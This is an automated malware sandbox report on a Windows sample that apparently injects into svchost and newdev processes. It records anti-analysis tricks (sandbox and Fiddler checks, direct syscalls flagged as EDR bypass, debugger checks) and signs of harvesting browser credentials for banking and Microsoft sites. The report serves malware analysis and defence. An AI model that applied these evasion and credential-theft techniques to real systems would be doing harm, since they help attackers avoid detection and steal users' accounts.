Source: C:\Users\user\Desktop\psibx9rXra.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\psibx9rXra.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\psibx9rXra.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\psibx9rXra.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\psibx9rXra.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\psibx9rXra.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\psibx9rXra.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\psibx9rXra.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\psibx9rXra.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\psibx9rXra.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\newdev.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Source: C:\Windows\SysWOW64\newdev.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Switches to a custom stack to bypass stack traces

Source: psibx9rXra.exe

Static file information: File size 1365504 > 1048576

Source: psibx9rXra.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: psibx9rXra.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: psibx9rXra.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: psibx9rXra.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: psibx9rXra.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: psibx9rXra.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: psibx9rXra.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GFwdSeXZEVUZM.exe, 00000004.00000002.3447028542.00000000008CE000.00000002.00000001.01000000.00000005.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3446773550.00000000008CE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: psibx9rXra.exe, 00000000.00000003.2193513593.0000000004240000.00000004.00001000.00020000.00000000.sdmp, psibx9rXra.exe, 00000000.00000003.2193144302.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2402494725.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2536259753.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400449383.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2536259753.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3456593581.0000000005300000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000005.00000003.2559655792.0000000004F9B000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000003.2561457724.000000000514C000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3456593581.000000000549E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: psibx9rXra.exe, 00000000.00000003.2193513593.0000000004240000.00000004.00001000.00020000.00000000.sdmp, psibx9rXra.exe, 00000000.00000003.2193144302.00000000043E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2402494725.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2536259753.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400449383.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2536259753.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3456593581.0000000005300000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000005.00000003.2559655792.0000000004F9B000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000003.2561457724.000000000514C000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3456593581.000000000549E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: NewDev.pdbGCTL source: svchost.exe, 00000002.00000003.2463415655.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463536253.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463565816.000000000362A000.00000004.00000020.00020000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000004.00000002.3453208541.0000000001428000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NewDev.pdb source: svchost.exe, 00000002.00000003.2463415655.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463536253.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463565816.000000000362A000.00000004.00000020.00020000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000004.00000002.3453208541.0000000001428000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: newdev.exe, 00000005.00000002.3458200823.000000000592C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000005.00000002.3446964791.0000000003558000.00000004.00000020.00020000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3456345871.00000000030FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2859106138.00000000373EC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: newdev.exe, 00000005.00000002.3458200823.000000000592C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000005.00000002.3446964791.0000000003558000.00000004.00000020.00020000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3456345871.00000000030FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2859106138.00000000373EC000.00000004.80000000.00040000.00000000.sdmp

Source: psibx9rXra.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: psibx9rXra.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: psibx9rXra.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: psibx9rXra.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: psibx9rXra.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00F84B37 LoadLibraryA,GetProcAddress,

0_2_00F84B37

Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FA8945 push ecx; ret	0_2_00FA8958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401A87 pushad ; retf	2_2_00401AA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401A87 push ebx; iretd	2_2_00401C07
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E845 push FFFFFFA2h; retf	2_2_0041E85F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401846 push ebx; iretd	2_2_00401847
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004018CE push ebx; iretd	2_2_004018CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00405159 push BCCE478Fh; retf	2_2_0040515E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040B91D push EC822BC1h; iretd	2_2_0040B922
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00411922 push ds; iretd	2_2_00411924
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004019B5 push ebx; iretd	2_2_004019B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401A68 push ebx; iretd	2_2_00401A69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004022CB push ebx; iretd	2_2_004022CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004022D9 push ebx; iretd	2_2_004022DA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040237A pushad ; retf	2_2_004023B5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401B04 push ebx; iretd	2_2_00401C07
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402311 push ebx; iretd	2_2_00402350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004023C4 pushad ; retf	2_2_004023B5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403470 push eax; ret	2_2_00403472
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004146BD pushad ; iretd	2_2_004146CA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404FDC push es; ret	2_2_00404FDF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401FF6 push ebx; iretd	2_2_00401FF7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C309AD push ecx; mov dword ptr [esp], ecx	2_2_03C309B6

Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00F848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00F848D7
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_01005376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_01005376

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FA3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00FA3187

Source: C:\Users\user\Desktop\psibx9rXra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\psibx9rXra.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\psibx9rXra.exe	API/Special instruction interceptor: Address: 19964EC
Source: C:\Windows\SysWOW64\newdev.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\newdev.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\newdev.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\newdev.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\newdev.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\newdev.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\newdev.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\newdev.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: psibx9rXra.exe, 00000000.00000003.2185036940.00000000019E1000.00000004.00000020.00020000.00000000.sdmp, psibx9rXra.exe, 00000000.00000003.2184929206.0000000001988000.00000004.00000020.00020000.00000000.sdmp, psibx9rXra.exe, 00000000.00000002.2208212007.00000000019E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXET
Source: psibx9rXra.exe, 00000000.00000003.2185036940.00000000019E1000.00000004.00000020.00020000.00000000.sdmp, psibx9rXra.exe, 00000000.00000003.2184929206.0000000001988000.00000004.00000020.00020000.00000000.sdmp, psibx9rXra.exe, 00000000.00000002.2208212007.00000000019E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03C7096E rdtsc

2_2_03C7096E

Source: C:\Windows\SysWOW64\newdev.exe	Window / User API: threadDelayed 658			Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Window / User API: threadDelayed 9316			Jump to behavior

Source: C:\Users\user\Desktop\psibx9rXra.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-105572

Source: C:\Users\user\Desktop\psibx9rXra.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %

Source: C:\Windows\SysWOW64\newdev.exe TID: 2224	Thread sleep count: 658 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe TID: 2224	Thread sleep time: -1316000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe TID: 2224	Thread sleep count: 9316 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe TID: 2224	Thread sleep time: -18632000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\newdev.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\newdev.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FE445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00FE445A
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FEC6D1 FindFirstFileW,FindClose,	0_2_00FEC6D1
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FEC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00FEC75C
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FEEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FEEF95
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FEF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FEF0F2
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FEF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00FEF3F3
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FE37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00FE37EF
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FE3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00FE3B12
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FEBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00FEBCBC

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00F849A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00F849A0

Source: 0O4Q3IKB.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 0O4Q3IKB.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 0O4Q3IKB.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 0O4Q3IKB.5.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: newdev.exe, 00000005.00000002.3459699500.00000000083A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sqlite_autoindex_autofill_edge_custom_data_1bal block list test formVMware20,11696487552
Source: 0O4Q3IKB.5.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: newdev.exe, 00000005.00000002.3459699500.00000000083A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: omVMware20,11696487552\|UE
Source: 0O4Q3IKB.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: newdev.exe, 00000005.00000002.3459699500.00000000083A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: swordVMware20,11696487552}
Source: 0O4Q3IKB.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: GFwdSeXZEVUZM.exe, 00000007.00000002.3450683144.000000000105F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: 0O4Q3IKB.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 0O4Q3IKB.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 0O4Q3IKB.5.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: 0O4Q3IKB.5.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 0O4Q3IKB.5.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: newdev.exe, 00000005.00000002.3446964791.0000000003558000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2865661690.0000020FF734D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 0O4Q3IKB.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 0O4Q3IKB.5.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 0O4Q3IKB.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 0O4Q3IKB.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 0O4Q3IKB.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: newdev.exe, 00000005.00000002.3459699500.00000000083A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tive Brokers - non-EU EuropeVMware20,11696487552
Source: 0O4Q3IKB.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 0O4Q3IKB.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 0O4Q3IKB.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: newdev.exe, 00000005.00000002.3459699500.00000000083A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bal block list test formVMware20,11696487552
Source: 0O4Q3IKB.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 0O4Q3IKB.5.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 0O4Q3IKB.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: newdev.exe, 00000005.00000002.3459699500.00000000083A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20
Source: 0O4Q3IKB.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 0O4Q3IKB.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 0O4Q3IKB.5.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 0O4Q3IKB.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 0O4Q3IKB.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 0O4Q3IKB.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: newdev.exe, 00000005.00000002.3459699500.00000000083A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,1169648iX,>~
Source: 0O4Q3IKB.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 0O4Q3IKB.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\psibx9rXra.exe

API call chain: ExitProcess graph end node

graph_0-104153

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03C7096E rdtsc

2_2_03C7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417823 LdrLoadDll,

2_2_00417823

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FF3F09 BlockInput,

0_2_00FF3F09

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00F83B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00F83B3A

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FB5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00FB5A7C

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00F84B37 LoadLibraryA,GetProcAddress,

0_2_00F84B37

Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_01995118 mov eax, dword ptr fs:[00000030h]	0_2_01995118
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_019967B8 mov eax, dword ptr fs:[00000030h]	0_2_019967B8
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_01996758 mov eax, dword ptr fs:[00000030h]	0_2_01996758
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEC3CD mov eax, dword ptr fs:[00000030h]	2_2_03CEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]	2_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]	2_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]	2_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]	2_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB63C0 mov eax, dword ptr fs:[00000030h]	2_2_03CB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]	2_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]	2_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]	2_2_03CDE3DB
